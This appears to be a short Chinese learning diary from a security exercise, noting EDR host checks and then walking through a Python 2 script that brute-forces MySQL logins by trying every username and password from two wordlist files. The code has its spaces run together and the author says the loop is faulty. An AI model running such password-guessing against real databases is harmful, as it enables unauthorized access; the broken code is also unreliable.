2019-07-29

护网 日常登入EDR等网站查看主机是否上线漏洞威胁等

几日已到规定工作日,为在EDR上出现的主机地址,通知相关人员对未上线的地址进行封堵

2019-07-29_第1张图片

python爆破数据库

爆破脚本大概代码 根据需求进行整改:https://www.jb51.net/article/94868.htm

sys.argv[x]的用法是:https://www.cnblogs.com/aland-1415/p/6613449.html

从网址中我们可以了解到基本的用法

输入  mysql.py username.txt password.txt localhost 3306

其中sys.argv[0]为第一个字符串 也就是mysql.py

以下代码为

mysql_username = open(sys.argv[1],mode='r')

common_weak_password =open(sys.argv[2],mode='r')

分别是读取1.2的文件也就是 username.txt password.txt

host = sys.argv[3]

port = sys.argv[4]

这里3.4 就是上述命令中的localhost 3306的

然后执行循环语句

因为脚本中的循环语句有问题 正确的循环语句还在学习中

forusername inmysql_username:

  forpassword incommon_weak_password:

    try:

      db =MySQLdb.connect(host, username, password)

      success =True

      ifsuccess:

        printusername, password

    exceptException, e:

      pass

这是可以查询到的循环语句需要整改

注意:python对空格有着严格的要求不能随意按否则会脚本运行错误


mysql_username = open(sys.argv[1],mode='r')

common_weak_password =open(sys.argv[2],mode='r')

这是读取username.txt password.txt 后的值将他输出起来感觉有点奇怪

你可能感兴趣的:(2019-07-29)